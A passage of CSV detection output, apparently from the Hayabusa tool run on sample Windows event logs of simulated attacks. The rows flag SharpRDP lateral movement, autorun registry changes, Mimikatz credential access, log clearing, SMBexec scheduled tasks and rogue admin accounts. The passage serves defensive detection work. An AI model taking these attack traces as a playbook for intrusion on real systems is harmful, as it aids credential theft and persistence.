Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\windows\system32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: rdpclip : Path: C:\Windows\System32\rdpclip.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""\\tsclient\c\temp\stack\a.exe"" : Path: \\tsclient\c\temp\stack\a.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-11 22:21:11.693 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:11.693 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:17.514 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:17.514 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:18.640 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:18.640 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 06:38:17.351 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\smbservice timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx +2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx +2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx +2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx +2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,medium,Local user account created,User: hacking-local-acct : SID:S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx +2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx +2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.568 